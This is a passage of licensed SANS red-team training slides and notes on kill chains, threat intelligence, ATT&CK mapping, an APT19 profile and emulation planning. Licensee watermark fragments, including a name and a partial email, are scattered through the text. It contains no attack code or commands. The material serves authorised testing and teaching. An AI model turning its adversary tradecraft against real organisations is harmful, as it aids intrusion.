Lincoln Mazzei nc o

ln

Laliberte’s Kill Chain: Argues that the Weaponization phase of the CKC is superfluous, because it cannot be defended against. Instead, the addition of a Lateral Movement phase is proposed, which occurs between the phases Command & Control and Action on Objectives.

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK ed

To :

Nachreiner’s Kill Chain: Removed the Weaponization phase from the CKC in his kill chain, because he argues that phases should be actionable by defenders

ce

ns

Bryant’s Kill Chain: Proposes to amend the CKC with the phases Privilege Escalation and Lateral Movement

Li

Malone’s Kill Chain: the most extensive expansion of the CKC is proposed by Malone, who leaves the initial model intact but expands it with two additional chains. Malone proposes that the internal kill chain consists of the phases Internal Reconnaissance, Internal Exploitation, Enterprise Privilege Escalation, Lateral Movement and Target Manipulation.

live

The Unified Kill Chain takes from all of these and proposed: • • •

Reconnaissance: Researching, identifying and selecting targets using active or passive reconnaissance. Weaponization: Coupling a remote access trojan with an exploit into a deliverable payload. Defense Evasion: Techniques an attacker may use for the purpose of evading detection or avoiding other defenses.

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

39

© SANS Institute 2020 • • •

Delivery: Techniques resulting in the transmission of the payload to the targeted environment. Exploitation: Techniques to exploit vulnerabilities in systems that may, among others, result in code execution. Persistence: Any access, action or change to a system that gives an attacker persistent presence on the system. Command & Control: Techniques that allow attackers to communicate with controlled systems within a target network. Pivoting: Tunneling traffic through a controlled system to other systems that are not directly accessible. Privilege Escalation: The result of techniques that provide an attacker with higher permissions on a system or network. Discovery: Techniques that allow an attacker to gain knowledge about a system and its internal network. Lateral Movement: Techniques that enable an adversary to access and control remote systems on a network. Execution: Techniques that result in execution of attacker-controlled code on a local or remote system. Credential Access: Techniques resulting in the access of, or control over, system, service or domain credentials. Target Manipulation: Techniques aimed at manipulation of the target system to achieve the objective of the attack. Collection: Techniques used to identify and gather information from a target network prior to exfiltration. Exfiltration: Techniques that result or aid in an attacker removing files and information from a target network.

• • • •

o.

22829180 @ ya

ho

• •

co

m



[email protected] Ap ril

• •

>



26 ,2 02 0

090aff33bcb6e401ded410120bc9a268

i< an

nm

ak

er

Reference: https://www.csacademy.nl/images/scripties/2018/Paul-Pols---The-Unified-Kill-Chain.pdf

nc o

ln

M

az

ze

Lincoln Mazzei

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

40

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 Framework for This Course

090aff33bcb6e401ded410120bc9a268 Like most organizations, this course will take a hybrid approach • Threat Intelligence • Planning • Testing

Closure

26 ,2 02 0

based on the frameworks and methodologies just introduced

Threat Intelligence

[email protected] Ap ril

− Red Team Exercise Execution

• Closure

− Analysis and Response − Report − Remediation and Action Plan

Planning

o.

co

m

>

Testing

SEC564 | Red Team Exercises and Adversary Emulation

41

ak

er

@ ya

ho

22829180 i< an

nm

Framework for This Course Like most organizations, this course will take a hybrid approach from the frameworks and methodologies just introduced. As you noticed, some frameworks place Threat Intelligence before Planning while others have it after. In this class, we want to introduce the phases as complete sections and therefore will start with Threat Intelligence.

ze

Lincoln Mazzei M

az

As you will see in the Planning Phase, some aspects rely on Threat Intelligence to be complete to known objectives, TTPs, and attack infrastructure that needs to be setup.

nc o

ln

The Planning Phase covers what triggers a Red Team Adversary Emulation Exercise, which will dictate the objectives and scope. We will cover Attack Infrastructure, which will lead to an exercise where students will set up their attack infrastructure and connect to the SEC564Lab environment. We will be performing a Red Team Exercise and Adversary Emulation against SEC564Target. Connection to the environment will be required for most exercises.

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Li

ce

ns

ed

Once everyone is set up with connectivity to the lab environment, we will cover other items related to Planning of a Red Team Exercise and Adversary Emulation. Planning covers a number of areas to ensure the Red Team Exercise is successful and provides value to all involved such as Trusted Agents, Roles and Responsibilities, and Rules of Engagements. With planning and threat intelligence phases complete, we will be ready to perform a Red Team Adversary Emulation Exercise. We will follow the ATT&CK and the Unified Kill Chain with many hands-on labs to reinforce many of the areas covered in the lecture portion of class.

live

We will wrap up with closure of the exercise, which includes analysis and response from the Blue Team, reporting, recommendations for remediation, and an action plan.

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

41

© SANS Institute 2020 Course Roadmap

Threat Intelligence

090aff33bcb6e401ded410120bc9a268 Defining Terms Motivation and Introduction Frameworks and Methodologies Threat Intelligence Lab 1.1: Consuming Threat Intelligence Planning Roles and Responsibilities Rules of Engagement Attack Infrastructure Lab 1.2: Attack Infrastructure Exercise Execution Reconnaissance Social Engineering Lab 1.3: Recon and Social Engineering Weaponization Delivery Lab 1.4: C2 and Weaponization

26 ,2 02 0

• Day 1: Introduction and Planning of Red Team Exercises • Day 2: Red Team Exercise Execution and Closure

o.

co

m

>

Ap ril

[email protected] SEC564 | Red Team Exercises and Adversary Emulation

42

ak

er

@ ya

ho

22829180 i< an

nm

This page intentionally left blank.

nc o

ln

M

az

ze

Lincoln Mazzei

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

42

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 Intelligence

090aff33bcb6e401ded410120bc9a268 • Intelligence is the collecting 26 ,2 02 0

and processing of information about a competitive entity and its agents, needed by an organization or group for its security and well-being • Intelligence is both a product and a process

o.

co

m

>

Ap ril

[email protected] https://www.jcs.mil/Portals/36/Documents/Doctrine/pubs/jp2_0.pdf SEC564 | Red Team Exercises and Adversary Emulation

43

ak

er

@ ya

ho

22829180 i< an

nm

Intelligence Before we cover Threat Intelligence, we need to define intelligence in a traditional sense. A now-declassified discussion is provided by CIA analyst Martin T. Bimfort, who pulls together a variety of definitions to formulate one that describes intelligence in the context of classic intelligence analysis:

ze

Lincoln Mazzei nc o

ln

M

az

“Intelligence is the collecting and processing of that information about foreign countries and their agents that is needed by a government for its foreign policy and for national security, the conduct of non-attributable activities abroad to facilitate the implementation of foreign policy, and the protection of both process and product, as well as persons and organizations concerned with these, against unauthorized disclosure.” From Bimfort’s definition, a generalized definition of intelligence can be formed:

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK ed

To :

Intelligence is the collecting and processing of information about a competitive entity and its agents, needed by an organization or group for its security and well-being.

Li

ce

ns

Intelligence is analyzed information. It is important to understand that to get intelligence requires lots of information, and information requires lots of data. Each of us is able to collect data from whatever our operational environment is. The network defender in an oil company in Saudi Arabia has a different operating environment than the network defender at a financial company in New York. Systems, supply chain, geopolitical events, culture, personnel, point in time, mission focus, etc. all play a role in what our operational environments are, not just the different types of data that can exist.

live

Examples in threat intelligence: • This is an IP address (Data) • This IP address is command and control for this malware (information)

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

43

© SANS Institute 2020 • The malware is on our systems (information) • We assess that the adversary is not purposely targeting our systems and that this is an incidental infection (Intelligence)

090aff33bcb6e401ded410120bc9a268 26 ,2 02 0

References: https://www.jcs.mil/Portals/36/Documents/Doctrine/pubs/jp2_0.pdf https://www.cia.gov/library/center-for-the-study-of-intelligence/kent-csi/vol2no4/html/v02i4a08p_0001.htm https://digital-forensics.sans.org/blog/2015/07/09/your-threat-feed-is-not-threat-intelligence/

o.

co

m

>

Ap ril

[email protected]

i< an

nm

ak

er

@ ya

ho

22829180

nc o

ln

M

az

ze

Lincoln Mazzei

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

44

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 Threat Intelligence for Red Team Exercises

090aff33bcb6e401ded410120bc9a268 Identify the Adversary

26 ,2 02 0

"Threat intelligence is evidence-based knowledge, including context, mechanisms, indicators, implications and actionable advice about an existing or emerging menace or hazard to assets that can be used to inform decisions regarding the subject's response to that menace or hazard." (Gartner) Extract TTPs

Create a Plan

Analyze & Organize

co

Gather Threat Intelligence

o.

Understand the Target Org

m

>

Ap ril

[email protected] Emulate the Adversary

SEC564 | Red Team Exercises and Adversary Emulation

45

ak

er

@ ya

ho

22829180 i< an

nm

Threat Intelligence for Red Team Exercises The main definition used in industry is from Gartner: "Threat intelligence is evidence-based knowledge, including context, mechanisms, indicators, implications and actionable advice about an existing or emerging menace or hazard to assets that can be used to inform decisions regarding the subject's response to that menace or hazard."

az

ze

Lincoln Mazzei nc o

ln

M

The following methodology for leveraging threat intelligence for Red Team exercises was inspired by a Katie Nickels and Cody Thomas presentation during the SANS Threat Hunting & Incident Response Summit on Sept. 6, 2018, titled: "ATT&CKing the Status Quo: Threat-Based Adversary Emulation with MITRE ATT&CK" Understand the target organization Whether you are a consulting company performing Threat Intelligence or performing the Red Team Exercise or an internal staff of the target organization, it is very important to understand the target organization.

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Li

ce

ns

ed

Identify the Adversary you want to emulate Consider who’s targeting the target organization. For Red Team Exercises, one will want to consider the adversary’s capability, intent, and opportunity. If the organization is new to Adversary Emulations, start with lower sophistication actors and work into more sophisticated ones as the Red Team program matures. Gather Threat Intelligence about that Adversary Threat Intelligence may be provided by a vendor, open source, or created internally. It is important to use multiple sources and consider the industry sources such as Information Sharing and Analysis Centers (ISACs).

live

Extract TTPs While it is important to understand the tools, aliases, and campaigns of the adversary, the Threat Intelligence for Red Team consumption will need further work to extract TTPs. Start at the tactical level with the adversary

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

45

© SANS Institute 2020 technical goals and then move to the techniques. Don’t forget to review certain behaviors that the adversary does that may not map exactly to a TTP. Analyze and Organize Once the TTPs have been extracted, match them to a framework such as ATT&CK. If a third-party company is providing the Threat Intelligence, they should perform this portion as well.

090aff33bcb6e401ded410120bc9a268 26 ,2 02 0

Create an Adversary Emulation Plan With TTPs extracted, analyzed, and organized, the Red Team can now draft the Adversary Emulation Plan for the exercise. Emulate the Adversary With good Threat Intelligence and Adversary Emulation Plan, the Red Team Exercise execution may begin.

co

m

>

Ap ril

[email protected]

References: Gartner, Inc., Definition: Threat Intelligence (2013, May 16), Retrieved from: https://www.gartner.com/doc/2487216/definition-threat-intelligence

o.

A curated list of awesome Threat Intelligence resources: https://github.com/hslatman/awesome-threat-intelligence https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1536260992.pdf

i< an

nm

ak

er

@ ya

ho

22829180

SANS Course: SANS FOR578: Cyber Threat Intelligence https://www.sans.org/course/cyber-threat-intelligence

nc o

ln

M

az

ze

Lincoln Mazzei

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

46

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 Understand the Target Organization

090aff33bcb6e401ded410120bc9a268 • Threat Intelligence providers and/or internal teams must 26 ,2 02 0

understand the organization, industry, and specific threat landscape of the country it operates in • Understand the attack surface of the target organization • The objective is to form a detailed preliminary picture of the target and its weak points from the attacker’s perspective • The output of this activity is the identification of the attack surfaces of people, processes, and technologies relating to the organization and its global digital footprint

o.

co

m

>

Ap ril

[email protected]

SEC564 | Red Team Exercises and Adversary Emulation

47

ak

er

@ ya

ho

22829180 i< an

nm

Understand the Target Organization Whether you are a consulting company performing Threat Intelligence or an internal team, it is very important to understand the target organization. To understand the target organization, the Threat Intelligence provider should carry out a broad exercise, of the kind typically undertaken by threat actors, as they prepare for their attack from outside the network. The objective is to form a detailed preliminary picture of the entity and its weak points from the attacker’s perspective. This will enable the threat intelligence to be put into context and will contribute to the development of the adversary scenarios in the Threat Intelligence Report. Some information should be provided by the entity based on interviews and discussions. The output of this activity is the identification, system-by-system basis, of the attack surfaces of people, processes and technologies relating to the entity, and its global digital footprint. This includes information that is intentionally published by the entity and internal information that has been unintentionally leaked. Such information could be customer data, confidential material or other information that could prove to be a useful resource for an attacker.

nc o

ln

M

az

ze

Lincoln Mazzei

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Li

ce

ns

ed

Reference: https://www.ecb.europa.eu/pub/pdf/other/ecb.tiber_eu_framework.en.pdf

live

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

47

© SANS Institute 2020 Identify the Adversary

090aff33bcb6e401ded410120bc9a268 • With a solid understanding of the organization, an adversary or threat actor(s) may be chosen • Start with lower sophistication actors and work up as more Red Team Exercises are planned

26 ,2 02 0

Intent

Ap ril

[email protected]

Opportunity

o.

co

m

>

Capability

SEC564 | Red Team Exercises and Adversary Emulation

48

ak

er

@ ya

ho

22829180 i< an

nm

Identify the Adversary Consider who’s targeting the target organization. For Red Team Exercises, one will want to consider the adversary’s capability, intent, and opportunity. If the organization is new to Adversary Emulations, start with lower sophistication actors and work into more sophisticated ones as the Red Team program matures.

ze

Lincoln Mazzei nc o

ln

M

az

Intent: Intent stems in a way from impact. It is immutable and driven by the industry you are in just as Impact is. Typically, at a high level, the intent of adversaries to whom security intelligence techniques are applied is data theft. Of course, for each intrusion, each compromise, or each actor, the intent will most likely be slightly different. Is the goal of the adversary to compromise operational details of a campaign, or technical details of a widget? There is nothing that can be done to influence intent.

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK ce

ns

ed

To :

Li

Opportunity: Opportunity is about timing and knowledge of the target space. In some cases, it pairs with vulnerability, but not always. It is one thing to be using a product with a 0-day vulnerability in it, but quite another when your adversary knows this. In other respects, however, opportunity is less related. For instance, wouldn't a company's benefits open enrollment period be a great time for a targeted attack on users using socially-engineered, topically-relevant email as a delivery vector?

Li

Capability - Put simply, capability is the ability of adversaries to successfully achieve their intended goal and leverage opportunity. It is influenced by things such as the skills of the adversaries and the resources (financial, human, and technical) available to them. To extend the 0-day example, a target may be vulnerable, the adversary may intend to steal data by exploiting this 0-day, but if he or she cannot write or obtain the exploit, then the risk is lower.

live

Reference: https://digital-forensics.sans.org/blog/2009/07/23/security-intelligence-introduction-pt-2/

48

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 Gather Threat Intelligence

090aff33bcb6e401ded410120bc9a268 Dissemination

Collection

26 ,2 02 0

Planning and Direction

m

>

Ap ril

[email protected] co

Processing and Exploitation

o.

Analysis and Production

SEC564 | Red Team Exercises and Adversary Emulation

49

ak

er

@ ya

ho

22829180

ln

M

az

ze

Lincoln Mazzei

Planning and Direction Collection Processing and Exploitation Analysis and Production Dissemination

nc o

• • • • •

i< an

nm

Gather Threat Intelligence One example of a model used heavily in the intelligence community is the Intelligence Life Cycle. This is a general process with five stages:

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK ns

ed

To :

Li

During the Planning and Direction stage: Intelligence gaps are identified and prioritized, and methods for filling those gaps are developed. A plan is set forth to where and how analysts will get the data and information they need. This drives collection.

Li

ce

The Collection stage: The plan is executed, and data is collected to fill the intelligence gap. Processing and Exploitation: Refers to any preparation needed for the raw data collected. This might be filtering, transformations of the data from one format to another, or extraction of key indicators collected.

live

Analysis and Production: Involves using processes such as structure analytic techniques (SATs) to evaluate processed information in order to fill information gaps and meet requirements identified during the planning and direction phase. Analysis will result in the formation of an analytic judgment, which must then be productized into a format consumable by the intended audience.

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

49

© SANS Institute 2020 Dissemination: Is the act of distributing the requested intelligence to the “customer” (note: you may be your own customer). This, of course, is then used by the customer to further their objective (improved defenses, better information on the location of a suspect for Law Enforcement (LE), a greater understanding of an adversary’s social or computer network for counterintelligence, etc.). Once intelligence is disseminated, more questions are raised, which leads to additional planning and direction of future collection efforts.

090aff33bcb6e401ded410120bc9a268 26 ,2 02 0

Request for Information (RFIs) generally describe a request by analysts focusing on one phase of the cycle for more information from analysts in another phase of the cycle. This could include subject matter expertise in areas unfamiliar to the requesting party, a clarification on processed data, or tasking to collect additional data, to amplify analysis.

[email protected] Ap ril

This process is generally followed by many of the US’s 14 intelligence community (IC) entities, such as the NSA and CIA, as well as the Department of Defense.

m

>

Reference:

o.

co

“Joint Publication 2-0, Joint Intelligence,” Defense Technical Information Center (DTIC). Department of Defense. 22 June 2007. pp. GL–11. Retrieved 10/1/2014.

i< an

nm

ak

er

@ ya

ho

22829180

nc o

ln

M

az

ze

Lincoln Mazzei

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

50

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 Types of Threat Intelligence

090aff33bcb6e401ded410120bc9a268 • Threat Intelligence will 26 ,2 02 0

come in various forms • Red Team is interested in threat intelligence from the top of the pyramid (TTPs)

o.

co

m

>

Ap ril

[email protected] David Bianco’s Pyramid of Pain SEC564 | Red Team Exercises and Adversary Emulation

51

ak

er

@ ya

ho

22829180 i< an

nm

Types of Threat Intelligence Threat Intelligence will come in various forms as shown in David Bianco’s Pyramid of Pain. The Red Team is interested in threat intelligence from the top of the pyramid.

Lincoln Mazzei M

az

ze

The Pyramid of Pain was created for the defense community as a method to distinguish different types of Indicators of Compromise. The bottom of the pyramid starts with the easier IoCs to identify in an environment working its way up the to the most difficult:

nc o

ln

Hash Values: SHA1, MD5 or other similar hashes that correspond to specific suspicious or malicious files. Often used to provide unique references to specific samples of malware or to files involved in an intrusion.

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK To :

Li

IP Addresses: IP Addresses or ranges known to be used by malicious actors.

ns

ed

Domain Names: This could be either a domain name itself (e.g., "evil.net") or maybe even a sub- or sub-subdomain (e.g., "this.is.sooooo.evil.net").

Li

ce

Network Artifacts: Observables caused by adversary activities on your network. Technically speaking, every byte that flows over your network as a result of the adversary's interaction could be an artifact, but in practice this really means those pieces of the activity that might tend to distinguish malicious activity from that of legitimate users. Typical examples might be URI patterns, C2 information embedded in network protocols, distinctive HTTP User-Agent or SMTP Mailer values, etc.

live

Host Artifacts: Observables caused by adversary activities on one or more of your hosts. Again, we focus on things that would tend to distinguish malicious activities from legitimate ones. They could be registry keys or values known to be created by specific pieces of malware, files or directories dropped in certain places or using certain names, names or descriptions or malicious services or almost anything else that's distinctive.

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

51

© SANS Institute 2020 Tools: Software used by the adversary to accomplish their mission. Mostly, this will be things they bring with them, rather than software or commands that may already be installed on the computer. This would include utilities designed to create malicious documents for spear phishing, backdoors used to establish C2 or password crackers or other host-based utilities they may want to use post-compromise.

090aff33bcb6e401ded410120bc9a268 26 ,2 02 0

Tactics, Techniques and Procedures (TTPs): How the adversary goes about accomplishing their mission, from reconnaissance all the way through data exfiltration and at every step in between. "Spear phishing" is a common TTP for establishing a presence in the network. "Spear phishing with a Trojaned PDF file" or "... with a link to a malicious .SCR file disguised as a ZIP" would be more specific versions. "Dumping cached authentication credentials and reusing them in Pass-the-Hash attacks" would be a TTP. Notice we're not talking about specific tools here, as there are any number of ways of weaponizing a PDF or implementing Pass-the-Hash.

[email protected] o.

co

m

>

Ap ril

Reference: https://detect-respond.blogspot.com/2013/03/the-pyramid-of-pain.html

i< an

nm

ak

er

@ ya

ho

22829180

nc o

ln

M

az

ze

Lincoln Mazzei

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

52

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 Extract Tactics,Techniques, and Procedures

090aff33bcb6e401ded410120bc9a268 T1068 – Exploitation for Privilege Escalation

T1086 – PowerShell

S0194 – PowerSploit

26 ,2 02 0

S0129 – AutoIT

m

>

Ap ril

[email protected] S0002 – Mimikatz

S0192 – Pupy

o.

co

T1003 – Credential Dumping IP Address

SEC564 | Red Team Exercises and Adversary Emulation

53

ak

er

@ ya

ho

22829180

Hash Value

i< an

nm

Extract Tactics, Techniques, and Procedures At this step, the Threat Intelligence analysts or Red Team should extract TTPs from the Threat Intelligence acquired and map it to a framework like ATT&CK, the industry standard to identify and document common TTPs of adversaries; it can be leveraged by Red Team and Blue Teams alike.

ze

Lincoln Mazzei nc o

ln

M

az

Tactics, Techniques, and Procedures are often abbreviated as TTPs and clustered together as one thing: “The adversary’s TTPs.” However, they represent three different aspects of adversary activity at different levels of abstraction. Tactics are high-level methods to achieve a goal (e.g. Initial Access, Exfiltration). Techniques are one step down that refer to how that goal will be achieved (e.g. Spear Phishing a link, Credential Dumping). Procedures are the granular step that describes the steps taken in achieving the goal.

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Li

ce

ns

ed

To :

Li

References: https://attack.mitre.org/ https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructiveadversary.html

live

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

53

© SANS Institute 2020 Adversary Profile

090aff33bcb6e401ded410120bc9a268 Category

Description

APT19 is a Chinese-based threat group that has targeted a variety of industries, including defense, finance, energy, pharmaceutical, telecommunications, high tech, education, manufacturing, and legal services.

Goal and Intent

Exist in the network to enumerate systems and information in order to maintain Command and Control to support future attacks.

Initial Access

Spear phishing emails with malicious attachments in RTF and XLSM to deliver initial exploits.

Execution/Evasion

PowerShell; Regsvr32; Rundll32; Scripting

C2 Overview

HTTP via common port - TCP port 80 for C2

Persistence

Modify existing service - Port 22 malware registered as a service Registry Run Keys/ Start up Folder

26 ,2 02 0

Description

o.

co

m

>

Ap ril

[email protected]

SEC564 | Red Team Exercises and Adversary Emulation

54

ak

er

@ ya

ho

22829180 i< an

nm

Adversary Profile Creating an Adversary profile is a great way of establishing a high-level plan for how the Red Team will execute testing. It may be as basic as the above table. The goal is to have a simple document to show what the Red Team will emulate.

ze

Lincoln Mazzei M

az

The above profile is taken from the extraction of TTPs from a Threat Intelligence reports on APT19. One may also search for APT19 on MITRE ATT&CK web site and find a similar description and mapping to techniques.

nc o

ln

Reference: https://attack.mitre.org/groups/G0073/

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

54

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 Leveraging ATT&CK – Navigator

26 ,2 02 0

090aff33bcb6e401ded410120bc9a268

co

m

>

Ap ril

[email protected] o.

MITRE has developed the ATT&CK Navigator. It’s a web application that represents the ATT&CK techniques in a dynamic fashion. It can be used to select specific techniques based on a threat group (e.g. select all APT-19 techniques). It may have TTPs assigned to an adversary that was not provided in the Threat Intelligence. SEC564 | Red Team Exercises and Adversary Emulation

55

ak

er

@ ya

ho

22829180 i< an

nm

Leveraging ATT&CK – Navigator MITRE has developed the ATT&CK Navigator, a web application that represents the ATT&CK techniques in a dynamic fashion. It can be used to select specific techniques based on a threat group (e.g. select all APT-19 techniques), after which modifications and annotations can be made. It may have TTPs assigned to an adversary that was not provided in the Threat Intelligence. Note that the techniques for Groups/Software in Navigator are fully referenced to open sources on MITRE ATT&CK Groups and Software pages. Navigator is open-source and can be self-hosted!

M

az

ze

Lincoln Mazzei nc o

ln

From ATT&CK Navigator: The ATT&CK Navigator is designed to provide basic navigation and annotation of ATT&CK matrices, something that people are already doing today in tools like Excel. We've designed it to be simple and generic - you can use the Navigator to visualize your defensive coverage, your red/blue team planning, the frequency of detected techniques or anything else you want to do. The Navigator doesn't care - it just allows you to manipulate the cells in the matrix (color coding, adding a comment, assigning a numerical value, etc.). We thought having a simple tool that everyone could use to visualize the matrix would help make it easy to use ATT&CK.

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Li

ce

The principal feature of the Navigator is the ability for users to define layers - custom views of the ATT&CK knowledge base - e.g. showing just those techniques for a particular platform or highlighting techniques a specific adversary has been known to use. Layers can be created interactively within the Navigator or generated programmatically and then visualized via the Navigator.

live

References: https://mitre-attack.github.io/attack-navigator/enterprise/ https://github.com/mitre-attack/attack-navigator

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

55

© SANS Institute 2020 Analyze and Organize

090aff33bcb6e401ded410120bc9a268 Organize the intelligence into a technical flow:

Initial Access Discovery Privilege Escalation Credential Access Persistence Lateral Movement

Discovery

PrivEsc

•Local Accounts •Connections to other Systems •Processes

•Legit Creds •Exploit Vulnerability

Credential Access

Persistence •Schtasks

•Mimikatz •Keylogging •Chrome passwords

>

Ap ril

[email protected] o.

co

m

1. 2. 3. 4. 5. 6.

26 ,2 02 0

Initial Access via Spear Phishing

Lateral Movement

SEC564 | Red Team Exercises and Adversary Emulation

56

ak

er

@ ya

ho

22829180 i< an

nm

Analyze and Organize Once the adversary has been selected, the threat intelligence obtained, and the TTPs extracted, it is time to analyze and organize the data, so it is consumable by the Red Team. The goal of this step is to provide an Adversary Emulation Scenario that the Red Team can follow and create an Adversary Emulation Execution plan with.

ze

Lincoln Mazzei nc o

ln

M

az

Organize the extracted TTPs into a technical flow by creating an order. MITRE ATT&CK is not meant to provide tactics in a certain order. For example, Red Team will need to setup Command and Control before weaponizing a payload and then sending a spear phishing email for Initial Access. Once Initial Access is obtained, the next tactic is generally Discovery followed by Privilege Escalation. Try to map out the order Red Teamers should follow. Note that it will not be perfect as once Initial Access is obtained, opportunities may arise to perform Tactics in different order.

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

56

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 Create an Adversary Emulation Plan

26 ,2 02 0

090aff33bcb6e401ded410120bc9a268

o.

co

m

>

Ap ril

[email protected] SEC564 | Red Team Exercises and Adversary Emulation

57

ak

er

@ ya

ho

22829180 i< an

nm

Create an Adversary Emulation Plan This is the final step of the Threat Intelligence process for Red Team Exercises. This step is often performed by the Red Team consuming the threat intelligence and creating the plan for the exercise execution phase. The Adversary Emulation Plan can serve to show what the plan will be before the exercise begins but also to document each step taken as the exercise is executed.

az

ze

Lincoln Mazzei nc o

ln

M

The plan should provide an overview of the Threat Intelligence that was obtained but focus on the tools and functionality. Often Red Team will not run the same tools the adversary uses but can create a tool that does the same. This is the safer approach. The plan document should then focus on the Exercise Execution Phase and what the Red Team will do to match the same TTPs as the adversary. This can be broken down in the Cyber Kill Chain or Unified Kill Chain steps.

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Li

ce

ns

ed

To :

References: https://attack.mitre.org/resources/adversary-emulation-plans/ https://attack.mitre.org/groups/G0022/ https://attack.mitre.org/docs/APT3_Adversary_Emulation_Plan.pdf

live

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

57

© SANS Institute 2020 Course Roadmap

Lab 1.1: Consuming Threat Intelligence

090aff33bcb6e401ded410120bc9a268 Defining Terms Motivation and Introduction Frameworks and Methodologies Threat Intelligence Lab 1.1: Consuming Threat Intelligence Planning Roles and Responsibilities Rules of Engagement Attack Infrastructure Lab 1.2: Attack Infrastructure Exercise Execution Reconnaissance Social Engineering Lab 1.3: Recon and Social Engineering Weaponization Delivery Lab 1.4: C2 and Weaponization

26 ,2 02 0

• Day 1: Introduction and Planning of Red Team Exercises • Day 2: Red Team Exercise Execution and Closure

o.

co

m

>

Ap ril

[email protected] SEC564 | Red Team Exercises and Adversary Emulation

58

ak

er

@ ya

ho

22829180 i< an

nm

This page intentionally left blank.

nc o

ln

M

az

ze

Lincoln Mazzei

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

58

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 Click1.1 To| Edit Master Title Style Lab Consuming Threat Intelligence

26 ,2 02 0

090aff33bcb6e401ded410120bc9a268 Please work on the lab exercise Lab 1.1: Consuming Threat Intelligence

o.

co

m

>

Ap ril

[email protected] SEC564 | Red Team Exercises and Adversary Emulation

59

ak

er

@ ya

ho

22829180 i< an

nm

This page intentionally left blank.

nc o

ln

M

az

ze

Lincoln Mazzei

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

59

© SANS Institute 2020 Course Roadmap

Planning

090aff33bcb6e401ded410120bc9a268 Defining Terms Motivation and Introduction Frameworks and Methodologies Threat Intelligence Lab 1.1: Consuming Threat Intelligence Planning Roles and Responsibilities Rules of Engagement Attack Infrastructure Lab 1.2: Attack Infrastructure Exercise Execution Reconnaissance Social Engineering Lab 1.3: Recon and Social Engineering Weaponization Delivery Lab 1.4: C2 and Weaponization

26 ,2 02 0

• Day 1: Introduction and Planning of Red Team Exercises • Day 2: Red Team Exercise Execution and Closure

o.

co

m

>

Ap ril

[email protected] SEC564 | Red Team Exercises and Adversary Emulation

60

ak

er

@ ya

ho

22829180 i< an

nm

This page intentionally left blank.

nc o

ln

M

az

ze

Lincoln Mazzei

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

60

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 Planning

Triggers Objectives Scope Trusted Agents Roles and Responsibilities Rules of Engagement

• • • • • •

Closure

26 ,2 02 0

090aff33bcb6e401ded410120bc9a268 The planning phase covers test preparation activities Threat Intelligence

Ap ril

[email protected] Planning

o.

co

m

>

Testing

SEC564 | Red Team Exercises and Adversary Emulation

61

ak

er

@ ya

ho

22829180 i< an

nm

Planning The Planning Phase covers test preparation activities. Rigorous test preparation is required to ensure risks are effectively managed and test objectives are achieved.

Lincoln Mazzei ln

M

